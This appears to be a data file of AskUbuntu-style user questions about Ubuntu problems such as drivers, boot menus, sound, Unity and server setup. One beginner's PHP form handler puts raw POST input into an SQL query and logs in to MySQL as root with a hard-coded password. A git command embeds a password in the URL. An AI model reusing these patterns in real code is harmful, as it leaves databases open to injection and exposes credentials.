306156	how do i fix `` no such file or folder '' on invocation of a terminal ?	bash : /home/boudaoud/openfoam/openfoam-2.1.1/etc/bashrc : no such file or folder of this type bash : /home/boudaoud/openfoam/openfoam-2.1.1/etc/bashrc : no such file or folder of this type bash : /home/boudaoud/openfoam/openfoam-2.1.1/etc/bashrc : no such file or folder of this type bash : /home/boudaoud/openfoam/openfoam-2.1.1/etc/bashrc : no such file or folder of this type i have this problem when starting terminal under ubuntu 13.04 .
306160	ca n't access live user session account in ubuntu 12.04	i made a new account with account type administrator . somehow my live session user account is not listed in user accounts at system settings . how to login as live session user again ?
306161	i installed lamp-server but a tiny progrme of php not run	i have installed lamp in ubuntu 12.04 using these commands : $ sudo apt-get install tasksel and $ sudo tasksel install lamp-server and run the following .php file in browser and it was executed by updating database < ? php $ con=mysqli_connect ( `` localhost '' , '' root '' , '' passwd '' , '' my_db '' ) ; // check connection if ( mysqli_connect_errno ( ) ) { echo `` failed to connect to mysql : `` . mysqli_connect_error ( ) ; } mysqli_query ( $ con , '' insert into persons ( firstname , lastname , age ) values ( 'peter ' , 'griffin',35 ) '' ) ; mysqli_query ( $ con , '' insert into persons ( firstname , lastname , age ) values ( 'glenn ' , 'quagmire',33 ) '' ) ; mysqli_close ( $ con ) ; ? > but when i use a .html file to connect a .php file and update mysql database the .php does not execute and want to save in a folder ( download folder as default ) . the .html file is : < html > < body > < form action= '' /var/www/entername.php '' method= '' post '' > firstname : < input type= '' text '' name= '' firstname '' > lastname : < input type= '' text '' name= '' lastname '' > age : < input type= '' text '' name= '' age '' > < input type= '' submit '' > < /form > < /body > < /html > and the entername.php file is : < ? php $ con=mysqli_connect ( `` localhost '' , '' root '' , '' passwd '' , '' my_db '' ) ; // check connection if ( mysqli_connect_errno ( ) ) { echo `` failed to connect to mysql : `` . mysqli_connect_error ( ) ; } $ sql= '' insert into persons ( firstname , lastname , age ) values ( ' $ _post [ firstname ] ' , ' $ _post [ lastname ] ' , ' $ _post [ age ] ' ) '' ; if ( ! mysqli_query ( $ con , $ sql ) ) { die ( 'error : ' . mysqli_error ( $ con ) ) ; } echo `` 1 record added '' ; mysqli_close ( $ con ) ; ? > please help !
306162	`` ownerless '' ( no permission ) ssd-friendly filesystem	a bit of context and needs : most time i 'm using ubuntu machines . i have a laptop which i do not carry around a lot , so i 'm in usermode ( no admin permissions ) lots of time . i have a large and fast 64gb pendrive which i would like to use . sometimes i use windows , but i do not expect compatibility . although it would be nice . using fat32 seems very primitive . but using xfs ( or ext4 , or ... ) tends to annoy because file owner and permissions and stuff . i do n't know if there 's a comfortable mode for that . could n't think any adequate btrfs option . using the pendrive without admin intervention is important . i considered having two partitions fat32 + xfs , and using the later only in my own computers and fine-tuning by hand the ownership ( have n't tried xfs pendrive mounting ) . but it seems a pain in the a** set-up . any ideas ? has somebody done something like this ? thanks !
306169	software center crash 13.04	i 'm having problems with the ubuntu software center , when i try to open it , after two seconds it closes . i 've tried reinstalling it but i keep getting this when i try sudo apt-get update : w : failed to fetch http : //ppa.launchpad.net/software-store-developers/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/software-store-developers/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . thanks !
306176	hourly git push	is it possible for me to automate a git push every hour via a batch script . i would typically type in this : git add * git commit -m `` latest update '' git push https : //username : password @ github.com/username/repository.git master how can i automate this ?
306179	no sound on aspireone with lubuntu	i have just bought an acer aspire one 725 . before trying anything else i installed lubuntu 13.04 immediately . i have no sound whatsoever , ( youtube videos , cds , mp3s , dvds ) . how can i find if this a a hardware or lubuntu missing driver problem ?
306183	software installed in ubuntu	i have a software installed in ubuntu in my pc . can i make a .deb or .tar.bz2 file of this software from here so that i can install this software in another machine without having internet connection ?
306184	why does n't this stream work ?	i have strange problem . these streams : http : //plus-zielona-01.eurozet.pl:8500/ http : //www.miastomuzyki.pl/n/rmfdance.pls http : //zetparty-01.eurozet.pl:8100/listen.pls are n't played by rhythmbox and totem too . the streams are correct , you can easily check it . i have ubuntu 13.04 with ubuntu-restricted-extras . with previous version 12.10 and 12.04 there is no problem .
306186	my terminal crashes upon opening	right when i open terminal , it closes without me seeing anything . i have searched endlessly and still have n't found a solution . i am using ubuntu 13.04 . when i open xterm , login as root , and type `` gnome-terminal '' a terminal pops up , but it wo n't open with the dash .
306187	please help me with wine and other software installation	i can not install wine on my computer and many other softwares . i have tried synaptic , terminal , and software center . i installed dependcies individually and still get this error though terminal building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . similar errors through synaptic and software center . i have tried suggestion from this website and some other ones but get the same error repeatedly .
306193	having problem while starting apache server	i have installed apache2 in my ubuntu 12.4 using sudo apt-get install apache2 , now i am not able to start the server , when i use service apache2 start , following things were displayed . bharathkumar @ hkbharath : ~ $ service apache2 start * starting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) mktemp : failed to create directory via template `/var/lock/apache2.xxxxxxxxxx ' : no such file or directory chmod : missing operand after `755' try `chmod -- help ' for more information . [ fail ] i tried uninstalling and reinstalling apache2 , but still getting the same thing , please help me to start my apache2 server . thanks
306196	no sound via hdmi using xubuntu 13.04 32 bit amd mesa 9.2	this question has perhaps been asked before but no clear solution seems to exist for me . i have a radeon 6850 connected to my screen via hdmi . the picture is fine but i get no sound at all , not even sound effects . this is via open source drivers . according to x.org foundation website , it says hdmi audio is `` done . '' i get no sound using my extra speakers with 3.5mm jack either into the motherboard itself or in the monitor . the pavucontrol seems to recognize both the built-in sound card and hdmi card from radeon , with the progress bar reacting to the youtube video currently on . switching between built-in card and hdmi does n't work . other things i 've tried include downgrading to 12.10 , adding the xorg-edgers ppa , manually updating the kernel to 3.9 , adding the radeon.audio=1 to grub , and downloading an alsa update from ubuntu audio development team . the only thing that has worked is installing fglrx , but that makes my emulators crash sometimes . attached here is the lspci and aplay output ... amd-fx @ amd-fx : ~ $ lspci | grep -i audio 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:00.1 audio device : advanced micro devices [ amd ] nee ati barts hdmi audio [ radeon hd 6800 series ] amd-fx @ amd-fx : ~ $ aplay -l **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc887-vd digital [ alc887-vd digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 any help is appreciated . thank you .
306204	webcam isnt detected/working 12.04	i have a hp pavilion laptop with a built in webcam which is n't being detected in ubuntu 12.04 . i have referred to this solution but i do n't have a camera button on my keyboard as described in that answer . any idea how i can get my webcam to work with ubuntu 12.04 ?
306207	thunderbird and google mail	i have n't used thunderbird for a while but when i started to use it again i found out that i have to give the application the password for imap.google.com . as far as i know , it 's the same password as the email 's . after i typed the password , i have an error that `` login failed '' . what should i do ? i 'm using ubuntu for a couple of months and i do n't know it very well yet ! thanks for helping ! : d
306211	how to make ps show child processes that are listed at htop ?	i am not being able to ps -p $ pid of some processes that are listed at htop ... one very well known that i can point out is nautilus ( so i think you can easly try it ) . there is a main process that ps can see , but there are 2 child processes listed on htop which pids bring nothing with ps ... how can i make ps see those child process ? as some other commands like gcore can interact with them ...
306212	how do i install ubuntu on a chromebook ?	i am trying to install ubuntu as as desktop usage on an acer c7 chromebook . i have downloaded it but it is asking for an app to open it . is there such an app ? is it possible to do this ?
306218	ubuntu 12.04 unity high resource usage	when i 'm trying to switch windows by clicking on the icon in the unity bar , it shows up the open windows and i can click on the one i want to switch to . but when i do that , my computer hangs up , for example if i 'm playing music , the playback stutters . i have a radeon hd 7850 , phenom ii x6 2.8ghz , 8 gb ddr3 . i 'm not using the graphics driver from the ubuntu repos because it 's not working for some reason , i had to install the one from amd 's website . but still , unity should n't be laggy while i 'm transiting between windows . anything i can do to fix that ?
306224	from where to start ?	i would like to ask about where to start learning linux os . i not asking aboout how to install it , or how to use the openoffice , or chromium explorer . i would like to have control of my computer in every single issue using the terminal commands . is there a recommended roadmap ? i guess that first i will need to know how is the architecture , kernel , layers etc , and then learn about commands in console , programing scripts , and so on ... please , give me an advice and if you can , an internet source of each item recommended by you .
306235	how i can set-up lxterminal in lubuntu to start maximized ?	when i push ctrl + alt + t i want see my default lxterminal in lubuntu 13.04 in full size ( not like f11 ) . i know that i can push ctrl + alt + f1 and get tty-terminal - it good for some situations , but sometimes i need , for example , copy text from/to terminal . i found that i can bind in .config/openbox/lubuntu-rc.xml command lxterminal -- geometry=85x27 - its very good , but sometimes i need configure not one pc with lubuntu - and all this pc may be with anothers screen resolution . and lxterminal -- geometry=85x27 look little as not good as , like lxterminal in full screen .
306237	how to disable the log files ?	to be specific i want to stop the kern.log and syslog files . i just installed xunbuntu about 2 days ago and have no experience with this os . i know they are supposedly important , but i have a hardware issue that leaves them running into the gigabytes . my partition is small so i do n't have a whole lot of free space for these files . in addition im running xunbuntu on a ssd so all this writing to the disk is annoying me . so if i could prevent their creation , that would be great . for the curious that must know the issue . im getting a nonstop log entry along the lines of `` iwl3945 ... radio disabled by hw rf kill switch '' everything is operating fine . lan , wifi , and bluetooth all work as they should . the log entries begin when i do n't have a cat5 cable connected or if i set the wifi hardware switch to the off position . and even when i do have them connected i have to enter a web browser before they acknowledge and verify a connection to the internet before the writing stops . i ca n't have an always online connection with this computer . it will probably spend more time offline . i also like to turn off the wifi hard switch to conserve battery .
306242	lxpanel empty except for 2 indicators	there is nothing in the lxpanel , except for 2 indicators : the wi-fi indicator and the battery indicator . i do n't know what 's going on , but i installed this session in ubuntu via tasksel . does anyone know how to fix this ?
306243	why does n't ubuntu show the latest nvidia drivers ?	apparently the nvidia 319 drivers have been out for a while now , but the latest you can download in ubuntu is 313 ? i need the latest drivers , but i 've read over and over again that if i install them manually via the nvidia website that i 'll run into issues when ubuntu updates drop . what do i do ? i have an nvidia 670 and i 'm getting crappy performance with the 313 drivers .
306244	open source driver hybrid card amd radeon hd 7730	i have been working on my gpu switching system for a while . i have recently decided to stick with the open source driver . those drivers were taken from the repo of xorg edgers . ok , i have followed all the instructions given by ubuntu and i have also made the script ubuntu is talking on his official page but there is something wrong with the switching . it seems that when i which to switch to the discrete gpu , the power is on for both card and the mark is on the integrated card . if i choose the integrated card the discrete goes off and the marker remains on the integrate card ( obviously ) . i have noticed that when i switch with the script i , ve got this message saying switching to a specific card . when it comes to the integrated , the first time it says that it switches then it saws that it already switched which is different for the discrete . it keeps saying switching to ... . i 've got a amd radeon hd 7730m with an intel hd 4000 running with ivybridge .
306245	how to install recommends using gdebi ?	gdebi apparently does n't install recommend packages by default , it only installs dependencies . i tried sudo gdebi -o= '' -- install-recommends '' package.deb but it does n't work . how to install also the recommend packages using gdebi ?
306249	./configure command no longer available	when installing apache , mysql , php from source ./configure does not a command anymore . what is the replacement for ./configure on ubuntu 13.10 ?
306250	what accounts for the differing instructions on setting password for postgres ?	i 'm following this blog post http : //hendrelouw73.wordpress.com/2012/11/14/how-to-install-postgresql-9-1-on-ubuntu-12-10-linux/ to install postgres on ubuntu . these are steps two and three . step 2 : install postgresql on your system sudo apt-get update sudo apt-get install postgresql-9.1 step 3 : configure your postgresql password sudo -u postgres psql template1 alter user postgres with encrypted password 'your_password ' ; however , i 'm also looking at a railscast which installs postgres on ubuntu . first , ryan bates does this root @ li349-144 : ~ # apt-get install postgresql libpq-dev and then he sets a password like this root @ li349-144 : ~ # sudo -u postgres psql terminal postgres= # \password enter new password : enter it again : so one big difference is in how the password is configured , in that the railscast does not touch something called template described in step 3 of the blogpost looking at the instructions for installing postgres on ubuntu https : //help.ubuntu.com/community/postgresql , it is similar to railscasts in that it does n't have this reference to template to create the user can you explain the difference and whether or not i should take this step ? step 3 : configure your postgresql password sudo -u postgres psql template1 alter user postgres with encrypted password 'your_password ' ;
306259	how to list opened nautilus tabs with qdbus ?	i am trying to dig into qdbus for nautilus to get a list of opened tabs ; i managed to do this so far : sites= ( `qdbus |grep nautilus -i` ) ; for sitesrc in $ { sites [ @ ] } ; do list= ( `qdbus $ sitesrc` ) ; for path in $ { list [ @ ] } ; do qdbus $ sitesrc $ path |sed -r `` s| . *| $ sitesrc $ path & | '' ; done ; done |sort -u # |grep paths -i for ex . : i was able to get a list of selected files with qdbus org.gnome.nautilusapplication /org/nautilus_actions/dbus/tracker/0 org.nautilus_actions.dbus.tracker.properties1.getselectedpaths but i cant find a clue for opened tabs locations ? ( so we can use on scripts to restore them later )
306261	why wo n't ubuntu boot past the blinking cursor after installing nvidia version319 drivers ?	i had to install the latest drivers because they do n't show up in the additional drivers list in the software & updates app . i followed the instructions , installed it from the terminal while logged out of my user , i did a sudo reboot and now drum roll ubuntu is selected at the grub loader , i hear the computer doing its magic , but i just stare at a blinking cursor . what is up with this ? i am completely lost , i mean this is my third visit to askubuntu today . btw i am in ubuntu 13.04 64bit and the drivers were for an nvidia 670
306265	complicated batch rename file problem	i did find the program pyrenamer , but i do n't seem to understand it . i have hundreds of files with name like main.php ? g2_view=core.downloaditem & g2_itemid=6027 & g2_serialnumber=3 here actually only the itemid and the serialnumber does change . serialnumber is 1 or 2 or 3 . i just need to rename them with file suffix jpg , and something like `` downloaditem '' .
306271	file ownership in 13.04 set to messagebus instead of syslog for /var/log files	forgive me if this has been asked and answered already , i did search and could n't find anything . on 12.10 , /var/log files were written to . auth.log , syslog , and others . however , both fresh install and upgrades to 13.04 result in auth.log and other files being empty . looking at the ownership , i see at least auth.log and a couple of others are now owned in 13.04 by messagebus : adm instead of syslog : adm as they were in 12.10 and earlier . changing the file ownership to syslog : adm on auth.log results in it being written to again . my question is , why are permissions being set this way in 13.04 and how do i go about reverting everything to what they should be ? my concern is that i may be able to fix a few things , but i have no idea what else is n't getting written to as a result of this possible bug .
306275	installed dual boot : goes straight to windows , does not show option to ubuntu	translated : i had no trouble installing ubuntu on a partition set as advanced in the process , but apparently the installation is incomplete because the restart does not give me the option to enter menu windows7 or linux . after trying several relocations in the stage of repair installed packages , the installation stops , and when i reboot , it does in windows7 as usual . original : no he tenido problemas para instalar ubuntu , en una partición que fije a medida que avancé en el proceso , pero aparentemente la instalación queda incompleta porque al reiniciar no me da el menú opcional para ingresar en windows7 o en linux . después de intentar varias reinstalaciones en la etapa de reparación de paquetes ya instalados , se interrumpe la instalación , y cuando reinicio , lo hace en windows7 como normalmente .
306280	decimal clock for strftime	is it possible to show decimal time , as in wiki - decimal time , on strftime ? if not , is there any plugin ?
306281	ca n't open ubuntu software center except from the terminal	i can run the ubuntu software center only with sudo software-center in the terminal . when i click on the desktop icon , ubuntu software center opens , and is frozen and shows a dimmed screen , and i have to kill the task in order to close it . how i can fix the desktop icon ?
306282	can i convert ubuntu into another form of ubuntu ?	can i convert ubuntu into another form of ubuntu like kubuntu or ubuntu studio and the system recognize itself as the new form ?
306283	ubuntu-tweak won`t work	i got this information and ubuntu-tweak does not run : $ ubuntu-tweak compizconfig - error : dlopen : /usr/lib/compizconfig/backends/libgsettings.so : nie moĺźna otworzyä pliku obiektu dzielonego : nie ma takiego pliku ani katalogu compizconfig - warning : unable to open backend gsettings , falling back to ini compizconfig - info : backend : ini compizconfig - info : integration : true compizconfig - info : profile : default [ utils.icon ] [ warning ] get_from_list for folder-home failed , try next ( icon.py:56 ) [ utils.icon ] [ warning ] get_from_list for folder-home failed , try next ( icon.py:56 ) ( ubuntu-tweak:9173 ) : gtk-error ** : gtkbox child gtktreeview minimum width : -1 < 0 for height 353 trap debugger / breakpoint i use gnome shell 3.8 any ideas ?
306291	accidentally killed unity ; got it back , but now there 's no window manager	today i was trying to resolve a longstanding annoyance , the fact that changes i make in compizconfig settings manager do not persist after a reboot . googling around , i saw that this appears to be a current bug , but one person claimed to have fixed the issue by going into ccsm 's preferences , then changing `` gsettings configuration backend '' to `` flat-file configuration backend '' . that seemed like a harmless enough thing to try , so i tried it . immediately after selecting the flat-file option , unity died . i was left with only the unadorned windows of programs i was running at the time . i tried rebooting , but came back to a desktop with unity still dead . fortunately one of my desktop icons is for my web browser , so i was able to start searching for a fix . after some fruitless twiddling in /etc/compizconfig , i was able to launch ccsm from the command line and reverted the option that had caused all the trouble , but unity stayed dead . eventually i read that i needed to enable the ubuntu unity plug-in . i did so ( not that i 'd ever disabled it ) , and was asked if i wanted to enable various other plug-ins , to which i naturally agreed . another reboot later , unity was back ! sort of . the launcher and desktop title bar ( or whatever it 's called ) were back , but now whenever i start an application , the window appears in the upper-left corner of the screen , partially obscured by the launcher and title bar , and it does n't sport any of the usual window manager dressing that would enable me to move it around , resize it , etc . and here i 'm stuck . any help getting the rest of the way to a working desktop would be much appreciated . ( unity does seem awfully fragile . last week i tried to unmount my iphone by right-clicking on its launcher icon and choosing `` unmount , '' and that killed unity too somehow . in that case , however , a reboot brought it back . )
306300	windows 7 does n't show up in the boot options	i have an asus-k55v . i had a dual boot with windows 7 and ubuntu 12.10 . recently i upgraded my ubuntu from 12.10 to 13.04 using the do-release-upgrade command . the update went fine , but after the update when i tried to boot into windows , it gave me an error , and restarted . then i used a windows installation usb and used the repair commands bootrec /fixboot bootrec /fixmbr when my machine booted this time the grub menu did n't show up , so i used a live ubuntu usb to recover my ubuntu . i used the boot-repair tool suggested at ubuntu sharing . now i got my 13.04 back and i ran the update-grub2 command to recover my windows , but it does not detect windows 7 now . i tried using my windows 7 installation usb to use the repair option , but even there it does not detect windows 7 . next i added the boot option myself by the procedure given at this post , and this post , yet there is no menu entry for windows in my grub . please help me to fix this issue .
306302	what does `` broadcast '' mean in ubuntu server ?	i 'm trying to make static network address , and it seems to be that broadcast address and network address need to acquire some ip addresses ... i wan na know what these two terms mean..thanks
306303	unrar fails when accents are present in filenames	i have the rar package installed . double clicking on .rar files opens the file in archive manager . it works fine when folders or files use only characters with no accentuation , but if there is some accentuation present ( inside the archives , not on the archive container filenames ) , then files that will open just fine in windows using winrar , 7zip or other archiver will produce an error message in ubuntu . the archive manager window will show the file list with wrong charsets , and trying to extract the files will produce two distinct errors : if i double click the file : rar 4.00 beta 3 copyright ( c ) 1993-2010 alexander roshal 17 dec 2010 shareware version type rar - ? for help extracting from /media/folder/file.rar no files to extract if i use the extract command : all the files in the archive will be extracted but ( invalid encoding ) will be attached to the end of the folders and files with accentuation .
306305	how to back up your internal hard drive os before instaling ubuntu	hi i was wondering how to back up my computer os and my stuff before formating the hard drive and instaling ubuntu because i do not want to lose my stuff and my os . also i do not want to buy a new hard drive
306307	computer boots up to command line ( probably )	i am very new to ubuntu . i have just installed ubuntu 12.04 2 days before . i was having a good time on ubuntu till today when i was installing some nvedia drivers . while they were n't installed ( in fact not downloaded ) , i think it would be the reason for my problems . when i boot , everything is normal except instead of desktop , a black screen appears in which i can write something . there is something else written like `` stopping save kernel messages '' , `` stopping log initial device creation '' ( they are many ) . sorry for being so basic , but i am quite a beginner . please help me solve this and restore the beautiful and fast ubuntu to normal . thanks in advance .
306308	hard disk drive ejected	i have recently installed ubuntu 13.04 and i have ejected my hard disk drives . now i can not find them on my devices list could anyone please help ?
306312	no dual boot menu after ubuntu 12.04 installation	i installed ubuntu 12.04 as a dual boot with windows 8 , and it boots me to ubuntu directly without showing any boot menu . i tried to repair it using refind , but refind failed to install . here is my system info : model : ata st320lt012-9ws14 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 420mb 419mb ntfs basic data partition hidden , diag 2 420mb 735mb 315mb linux-swap ( v1 ) efi system partition boot 3 735mb 869mb 134mb microsoft reserved partition bios_grub 4 869mb 305gb 304gb ntfs basic data partition 5 305gb 320gb 15.0gb ext4 basic data partition hidden , diag and here is the message for the failed install of refind which is supposed to fix the bootloader issue : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25a ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 142769 files and directories currently installed . ) preparing to replace refind 0.6.11-1 ( using ... /refind_0.6.11-1_amd64.deb ) ... unpacking replacement refind ... setting up refind ( 0.6.11-1 ) ... /var/lib/dpkg/info/refind.postinst : line 4 : efibootmgr : command not found installing refind on linux ... . espfilesystem is '' //boot/efi does n't seem to be on a vfat filesystem . the esp must be mounted at //boot or //boot/efi and it must be vfat ! aborting ! dpkg : error processing refind ( -- install ) : subprocess installed post-installation script returned error exit status 1
306324	ca n't boot into any os on my computer , what should i do ? [ ubuntu 12.10 ]	was using ubuntu 12.10 ( on a thinkpad t430i ) , things started jumping and freezing so i shut down . when i try to boot up , it always fails . trying to boot in recovery mode , i get errors such as `` i/o error ( dev sda ) '' , `` mounting /dev on /root/dev failed : no such file/directory . '' i ran a diagnostic to check for sector errors and there were a lot ( e.g . sector error 5936256 ; however i did not tell my lenovo machine to try and fix the errors ) . i can be more specific if you tell me what to post , but the amount of errors i 'm getting is vast . windows 7 will not boot either . i 'm guessing there 's something fatally wrong with the hard-drive . so my primary question is : how can i back-up my data before i try any fixes ? there are numerous files i had not yet backed up . my secondary question is : what steps should i take to try and diagnose and fix this problem ? thank you enormously in advance . update : i booted up with ubuntu live cd . i could n't get fdisk to run , but when i tried to mount 232 gb file system i get the following error : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so when i run disk utility on my hard disk , i get : current pending sector count , normalized 59 , worst 59 , threshold 0 , and value 1160 sectors . screenshot of smart data is here : http : //www.foopics.com/show/01f6dc2a4e47915367be5300b57500f1 so that looks bad ... do i have any option besides making a clone of the file system ?
306327	is dmidecode 's max memory report is accurate ?	after googling for a while i 've found `` sudo dmidecode -t 16,17 '' to check max amount of memory in my laptops . based on its report my hp pavilion g4-1002tu laptop can accept a max of 16gb , while the hp website says it can only handle 8gb . funny thing is when i checked my asus eee pc r105 atom n450 which only has 1 slot with a max of 2gb ram it is reported to have 2 slots for ram and can hold 4gb of memory ! even on intel 's website it said max amount of memory is 2gb ! could anyone kindly explain this matter , as i am planning on upgrading my hp g4 's memory . have a nice day and thank you very much in advance .
306328	unity disappeared after updating	unity just disappeared after a software update . rebooting did n't help and neither did resetting compiz .
306335	from /media/blabla to media/my_name/blabla	i have a ntfs disk which used to get mapped to media/a6505a54505a2b11_/ . there was also a directory media/a6505a54505a2b11/ . then all of a sudden it started to get mapped to media/my_name/a6505a54505a2b11/ . the directories media/a6505a54505a2b11/ and media/a6505a54505a2b11_/ still exist but i have 'access denied ' whenever i want to browse them . what happened and how do i make it sure that this disk will be mapped only to the certain directory ?
306337	ubuntu 13.04 64bit unity desktop freezing	the screen freezes with the exception of movement by mouse , i went to a virtual tty with ctrl+alt+f2 and reran unity which unfroze the desktop . this is the tail of my /var/log/syslog : praveen @ praveen-xps-l412z : ~ $ tail -f /var/log/syslog jun 10 11:17:01 praveen-xps-l412z cron [ 25625 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jun 10 11:22:15 praveen-xps-l412z kernel : [ 6184.595684 ] [ drm : i915_hangcheck_hung ] *error* hangcheck timer elapsed ... gpu hung jun 10 11:22:15 praveen-xps-l412z kernel : [ 6184.595690 ] [ drm ] capturing error event ; look for more information in /debug/dri/0/i915_error_state jun 10 11:23:17 praveen-xps-l412z gnome-session [ 7781 ] : warning : application 'compiz.desktop ' killed by signal 9 jun 10 11:23:17 praveen-xps-l412z gnome-session [ 7781 ] : warning : app 'compiz.desktop ' respawning too quickly jun 10 11:23:17 praveen-xps-l412z gnome-session [ 7781 ] : critical : we failed , but the fail whale is dead . sorry ... . jun 10 11:23:18 praveen-xps-l412z gnome-session [ 7781 ] : warning : app 'compiz.desktop ' respawning too quickly please let me know about a permanent fix as this recurs .
306340	how to set netbeans as a default editor in filezilla	when i open any php , html , or css files filezilla opens them in gedit . instead i would like filezilla to open them in netbeans 7.3 . i would like to set netbeans as the default editor in filezilla . please suggest a procedure to open the files in netbeans 7.3 .
306352	rsync daemon failed to start	while configuring one of openstack 's components i had to restart rsync using the command sudo service rsync restart . doing this , i get the following error message : * restarting rsync daemon rsync * rsync daemon not running , attempting to start . * rsync daemon failed to start appreciate any help regarding this . edit : the contents of /etc/rsyncd.conf are as follows : uid = swift gid = swift log file = /var/log/rsyncd.log pid file = /var/run/rsyncd.pid address = 127.0.0.1 # address = < storage_local_net_ip > [ account ] max connections = 2 path = /srv/node/ read only = false lock file = /var/lock/account.lock [ container ] max connections = 2 path = /srv/node/ read only = false lock file = /var/lock/container.lock [ object ] max connections = 2 path = /srv/node/ read only = false lock file = /var/lock/object.lock
306359	install phpize on ubuntu	i wanted to know if there was a way of installing only phpize . i 've installed it by executing sudo apt-get install php5-dev . i wanted to know if there was a way to just install phpize only .
306362	when i run nautilus or guake from awesome wm the wallpaper is reverted to my unity background	i 'm using awesome wm on a ubuntu 12.04 . it works fine except that whenever i run guake or nautilus should the background being reverted back to what 's my background on unity . on using nautilus , there 's a simple workaround that i 've found here problem with nautilus when using awesome but is there a permanent configuration to set here so as to not conflict with awesome ? but i have n't found a solution yet when using guake .
306364	how to delete inet6 link address automatically ?	there is an inet6 addr on the eth0 interface : eth0 link encap : ethernet hwaddr 00:0c:29 : d9:46 : f5 inet6 addr : fe80 : :20c:29ff : fed9:46f5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38 errors:0 dropped:0 overruns:0 frame:0 tx packets:193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4133 ( 4.1 kb ) tx bytes:32902 ( 32.9 kb ) interrupt:19 base address:0x2024 i do n't need this address and i use the following command to delete it : sudo ifconfig eth0 inet6 del fe80 : :20c:29ff : fed9:46f5/64 however , each time i restart the system , this address comes back . how to disable the autoconfigured inet6 address ?
306366	change screen resolution detection timeout	i 'm using a kvm switch for using two laptops . one is connected to ubuntu 12.10 . the problem i have , is that every time i switch to the other pc , ubuntu changes the resolution back to the integral laptop monitor . when i switch back to work again with ubuntu , i have to wait ~5 seconds until the screen resolution is detected again . i figured out , the once i 'm back on ubuntu , if i open system settings- > displays . it changes to the correct resolution instantly . there 's must be some sort of timeout that occurs that forces resolution change . can i configure this timeout value somewhere ? updates : problem occurs also on ubuntu 12.04 , and on pc ( not laptop )
306367	unable to install openjdk	i have two questions : i want to install jdk so i wrote to terminal : sudo apt-get install openjdk-7-jdk but this message shown , while my computer was connected internet : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package openjdk-7-jdk i ca n't add ppa to software sources example i want to add my-local-repo file to software source ( this file is deb package ) , and this file is located at /home/einollah/my-local-repo so i type on software-properties-gtk ( deb file : //home/einollah/my-local-repo./ ) but the add source button did n't work . please tell me what i do ? i have the latest public release version 13.04 of ubuntu .
306371	is lxde/lubuntu under active development ?	i got here a comment that lxde is somehow `` deprecated '' , not actively developed , entailing that the problems some programs may have in lxde ( qbittorrent , in the case of the linked comment ) should be dismissed on that basis . what is the situation ?
306375	how to install ubuntu 13.04 alongside with windows 8 ?	i have a dell inspiron 5521 laptop with 4gb ram 1tb hard-disk with windows 8 pro genuine . my hard-disk includes 4 partition ( including c drive ) : in 4th partition , which is of 71 gb , i want to install ubuntu 13.04 ( alongside with windows 8- dual boot ) , but whenever i try to install with the helpof bootable usb , it shows only 1 harddisk : no partitions , and another option `` erase all and install ubuntu '' which i do n't prefer . how can i install ubuntu alongside windows 8 ?
306376	how to extend ubuntu partition size ?	ok , so dev/sda1 is empty now , but it had windows xp installed there . dev/sda5 is ubuntu . i want to delete dev/sda1 and extend dev/sda5 . in gparted livecd , when i delete dev/sda1 and try to resize dev/sda5 it wo n't allow me to do that . so how do i do that ?
306377	environmental variable	i am newly for ubuntu and i just downloaded mulval software packet to run it on my ubuntu , but i still not clear that the instruction say this : '' the environmental variable mulvalroot should point to this package 's root folder include $ mulvalroot/bin and $ mulvalroot/utils in path '' i installed mulval in my home directory : worravit @ worravit-aspire-5715z : ~/mulval $ i read some questions in this community but those of them differences from mine . could anyone give me clear instruction please ?
306378	dmcrypt passphrases	dmcrypt passphrase management is there any way we may have the dmcrypt passphrase managed centrally using a challenge response for > 5000 clients ? i am looking at a solution which is closer to pointsec/checkpoint . we have been able to save the encyption header for each laptop running ubuntu in our organization , however there is a serious concern in case someone is not online and still needs a remote assistance from the service desk . we used puppet for user as well as configuration changes . but my challenge is to integrate it with a challenge response mechanism and achieve : should be able to reset the password as forced by the password expiry policy . service desk should be able to help user who forgets the passphrase even when he/she is not on the network . should be able to store a master passphrase in one of the slots to have it stored in a secure database for data forensics purposes .
306379	ubuntu : how to listen to music streams on the web without flash ( by finding the ip address of the streaming server ? )	how can i find the ip address of a music streaming service in ubuntu ? specifically : how can i do this for : 106kmel : http : //www.iheart.com/live/293/ ? autoplay=true hot97 : http : //www.hot97.com/hotstream/ why i 'm asking : these streaming services still require you to use flash . but flash requires heavy cpu work ( see for example the process `` plugin-container '' , in the case of firefox ) . that 's climate change due to stupid software and i 'm not ok with that . so the idea was : find the direct ip of the web radio station 's streaming server use rythmbox ( or any other steaming application ) to listen to these streams
